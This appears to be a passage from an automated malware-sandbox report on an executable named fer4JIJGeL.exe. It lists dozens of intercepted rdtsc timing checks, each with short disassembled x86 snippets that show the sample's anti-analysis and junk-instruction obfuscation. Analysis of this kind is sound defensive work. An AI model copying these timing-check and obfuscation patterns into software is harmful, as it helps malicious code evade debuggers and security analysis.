Source: C:\Users\user\Desktop\fer4JIJGeL.exe | RDTSC instruction interceptor: First address: E0D644 second address: E0D691 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F10525C02h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c jmp 00007F9F10525C06h 0x00000011 pop eax 0x00000012 pop ebx 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F9F10525C06h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | RDTSC instruction interceptor: First address: E0D691 second address: E0D69C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F9F112ED796h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | RDTSC instruction interceptor: First address: E0D69C second address: E0D6BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jbe 00007F9F10525BFEh 0x0000000f push esi 0x00000010 jl 00007F9F10525BF6h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e push esi 0x0000001f pop esi 0x00000020 rdtsc
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | RDTSC instruction interceptor: First address: E0D6BC second address: E0D701 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F9F112ED798h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop eax 0x00000010 mov edi, dword ptr [ebp+122D39AFh] 0x00000016 push 00000003h 0x00000018 xor ecx, dword ptr [ebp+122D395Fh] 0x0000001e push 00000000h 0x00000020 mov edx, dword ptr [ebp+122D383Fh] 0x00000026 push 00000003h 0x00000028 mov edx, dword ptr [ebp+122D3807h] 0x0000002e push 651E852Dh 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F9F112ED79Fh 0x0000003b rdtsc
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | RDTSC instruction interceptor: First address: E0D701 second address: E0D705 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | RDTSC instruction interceptor: First address: E0D705 second address: E0D72C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 add dword ptr [esp], 5AE17AD3h 0x0000000e adc dx, 4756h 0x00000013 lea ebx, dword ptr [ebp+124584D3h] 0x00000019 mov dword ptr [ebp+122D25D5h], ebx 0x0000001f xchg eax, ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push edx 0x00000024 pop edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | RDTSC instruction interceptor: First address: E0D72C second address: E0D731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | RDTSC instruction interceptor: First address: E0D731 second address: E0D73B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9F112ED79Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | RDTSC instruction interceptor: First address: E0D73B second address: E0D759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F9F10525C01h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | RDTSC instruction interceptor: First address: E0D7E9 second address: E0D7EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | RDTSC instruction interceptor: First address: E0D7EE second address: E0D840 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9F10525BFCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b js 00007F9F10525C04h 0x00000011 nop 0x00000012 mov ecx, ebx 0x00000014 push 00000000h 0x00000016 mov edi, 2864FADEh 0x0000001b mov esi, dword ptr [ebp+122D39CFh] 0x00000021 push BE43E731h 0x00000026 push eax 0x00000027 push edx 0x00000028 push esi 0x00000029 jmp 00007F9F10525C04h 0x0000002e pop esi 0x0000002f rdtsc
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | RDTSC instruction interceptor: First address: E0D840 second address: E0D845 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | RDTSC instruction interceptor: First address: E0D845 second address: E0D8C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 41BC194Fh 0x00000010 jmp 00007F9F10525BFBh 0x00000015 push 00000003h 0x00000017 mov di, 9CAFh 0x0000001b push 00000000h 0x0000001d mov edx, edi 0x0000001f push 00000003h 0x00000021 push 00000000h 0x00000023 push edi 0x00000024 call 00007F9F10525BF8h 0x00000029 pop edi 0x0000002a mov dword ptr [esp+04h], edi 0x0000002e add dword ptr [esp+04h], 00000018h 0x00000036 inc edi 0x00000037 push edi 0x00000038 ret 0x00000039 pop edi 0x0000003a ret 0x0000003b push 496DA1C1h 0x00000040 push ecx 0x00000041 jmp 00007F9F10525BFDh 0x00000046 pop ecx 0x00000047 add dword ptr [esp], 76925E3Fh 0x0000004e mov dword ptr [ebp+122D25CDh], ebx 0x00000054 lea ebx, dword ptr [ebp+124584DCh] 0x0000005a add dword ptr [ebp+122D24BAh], esi 0x00000060 xchg eax, ebx 0x00000061 push eax 0x00000062 push edx 0x00000063 je 00007F9F10525BFCh 0x00000069 jnl 00007F9F10525BF6h 0x0000006f rdtsc
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | RDTSC instruction interceptor: First address: E0D937 second address: E0D9A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 jbe 00007F9F112ED7B2h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F9F112ED798h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 jns 00007F9F112ED79Ch 0x0000002e add di, 6371h 0x00000033 sbb ecx, 557A33FBh 0x00000039 push 00000000h 0x0000003b stc 0x0000003c call 00007F9F112ED799h 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 push edx 0x00000045 pop edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | RDTSC instruction interceptor: First address: E0D9A6 second address: E0D9AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | RDTSC instruction interceptor: First address: E0D9AA second address: E0D9B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | RDTSC instruction interceptor: First address: E0D9B5 second address: E0D9C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push ecx 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | RDTSC instruction interceptor: First address: E0D9C0 second address: E0DA4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push ebx 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f pop ebx 0x00000010 mov eax, dword ptr [eax] 0x00000012 jmp 00007F9F112ED79Ch 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b jmp 00007F9F112ED7A0h 0x00000020 pop eax 0x00000021 movsx edi, di 0x00000024 push 00000003h 0x00000026 add dl, FFFFFFA0h 0x00000029 push 00000000h 0x0000002b xor dword ptr [ebp+122D3261h], esi 0x00000031 push 00000003h 0x00000033 or cl, 0000007Eh 0x00000036 push 983C7B60h 0x0000003b jno 00007F9F112ED7A0h 0x00000041 add dword ptr [esp], 27C384A0h 0x00000048 mov dword ptr [ebp+122D21AFh], ecx 0x0000004e lea ebx, dword ptr [ebp+124584E7h] 0x00000054 mov dx, ax 0x00000057 push eax 0x00000058 pushad 0x00000059 push eax 0x0000005a jmp 00007F9F112ED7A3h 0x0000005f pop eax 0x00000060 push ebx 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | RDTSC instruction interceptor: First address: E2BE40 second address: E2BE5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F9F10525C04h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | RDTSC instruction interceptor: First address: E2C119 second address: E2C121 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | RDTSC instruction interceptor: First address: E2C121 second address: E2C12B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9F10525BFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | RDTSC instruction interceptor: First address: E2C12B second address: E2C144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F9F112ED79Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | RDTSC instruction interceptor: First address: E2C928 second address: E2C92F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | RDTSC instruction interceptor: First address: E2CA74 second address: E2CA7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | RDTSC instruction interceptor: First address: E2CA7A second address: E2CA80 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | RDTSC instruction interceptor: First address: E2CA80 second address: E2CA9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9F112ED7A7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | RDTSC instruction interceptor: First address: E2CBE6 second address: E2CBEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | RDTSC instruction interceptor: First address: E2CD3B second address: E2CD54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F112ED79Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | RDTSC instruction interceptor: First address: E2CD54 second address: E2CD58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | RDTSC instruction interceptor: First address: E242C2 second address: E242C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | RDTSC instruction interceptor: First address: E242C6 second address: E242CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | RDTSC instruction interceptor: First address: E242CC second address: E242D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | RDTSC instruction interceptor: First address: E2CFD1 second address: E2D03E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F10525BFCh 0x00000009 jmp 00007F9F10525C01h 0x0000000e push edx 0x0000000f jmp 00007F9F10525C01h 0x00000014 jl 00007F9F10525BF6h 0x0000001a pop edx 0x0000001b popad 0x0000001c pushad 0x0000001d pushad 0x0000001e jmp 00007F9F10525C02h 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 jmp 00007F9F10525C08h 0x0000002b push ebx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | RDTSC instruction interceptor: First address: E2D716 second address: E2D735 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F112ED7A9h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | RDTSC instruction interceptor: First address: E2D9EA second address: E2D9EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | RDTSC instruction interceptor: First address: E2D9EE second address: E2DA78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F112ED7A1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F9F112ED79Eh 0x00000011 jmp 00007F9F112ED7A0h 0x00000016 popad 0x00000017 pushad 0x00000018 jmp 00007F9F112ED7A1h 0x0000001d push esi 0x0000001e pop esi 0x0000001f jne 00007F9F112ED796h 0x00000025 push ecx 0x00000026 pop ecx 0x00000027 popad 0x00000028 popad 0x00000029 pushad 0x0000002a pushad 0x0000002b push ecx 0x0000002c pop ecx 0x0000002d push edx 0x0000002e pop edx 0x0000002f jg 00007F9F112ED796h 0x00000035 popad 0x00000036 ja 00007F9F112ED7AEh 0x0000003c jmp 00007F9F112ED7A8h 0x00000041 push eax 0x00000042 push edx 0x00000043 jnc 00007F9F112ED796h 0x00000049 push ebx 0x0000004a pop ebx 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E2DA78 second address: E2DA7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E2FAD6 second address: E2FADA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E2FADA second address: E2FAE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E2FAE0 second address: E2FAFF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9F112ED7A9h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E2FAFF second address: E2FB05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E33D0B second address: E33D11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E33D11 second address: E33D1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E33D1F second address: E33D59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e je 00007F9F112ED7AFh 0x00000014 jmp 00007F9F112ED7A9h 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d pushad 0x0000001e push ecx 0x0000001f push edx 0x00000020 pop edx 0x00000021 pop ecx 0x00000022 push eax 0x00000023 push edx 0x00000024 push esi 0x00000025 pop esi 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E000EA second address: E00118 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 ja 00007F9F10525BF6h 0x0000000c jmp 00007F9F10525C06h 0x00000011 popad 0x00000012 jnl 00007F9F10525BF8h 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E00118 second address: E0011E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E373E1 second address: E373E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E373E5 second address: E373EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E3750D second address: E37513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E37513 second address: E37517 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E37517 second address: E3751D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E3751D second address: E3752E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jnc 00007F9F112ED796h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E37993 second address: E379B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007F9F10525BFBh 0x0000000b jbe 00007F9F10525BF6h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 popad 0x00000015 jo 00007F9F10525C10h 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E37B31 second address: E37B38 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E3AF4B second address: E3AF5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F10525BFFh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E3BBD6 second address: E3BC0A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9F112ED796h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], ebx 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F9F112ED798h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 xor dword ptr [ebp+122D324Ah], eax 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E3D76B second address: E3D779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jg 00007F9F10525BF6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E3E6C7 second address: E3E6CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E3E6CB second address: E3E6EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov edi, dword ptr [ebp+12479C5Bh] 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 mov dword ptr [ebp+122D21A6h], esi 0x00000018 xchg eax, ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pop edx 0x0000001e pop eax 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E3E6EA second address: E3E6EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E3E6EF second address: E3E6F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E43337 second address: E43342 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E439AE second address: E439B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E44346 second address: E443BE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007F9F112ED798h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ecx 0x00000028 call 00007F9F112ED798h 0x0000002d pop ecx 0x0000002e mov dword ptr [esp+04h], ecx 0x00000032 add dword ptr [esp+04h], 0000001Ch 0x0000003a inc ecx 0x0000003b push ecx 0x0000003c ret 0x0000003d pop ecx 0x0000003e ret 0x0000003f jmp 00007F9F112ED7A5h 0x00000044 push 00000000h 0x00000046 sbb esi, 6C8DE7FDh 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 pushad 0x00000051 popad 0x00000052 push ebx 0x00000053 pop ebx 0x00000054 popad 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E443BE second address: E443C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E4876C second address: E48772 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E48772 second address: E48776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E48776 second address: E4877A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E49771 second address: E49775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E48954 second address: E48958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E49775 second address: E49779 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E49779 second address: E4977F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E4977F second address: E497A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jmp 00007F9F10525C01h 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E4A869 second address: E4A86D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E4A86D second address: E4A871 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
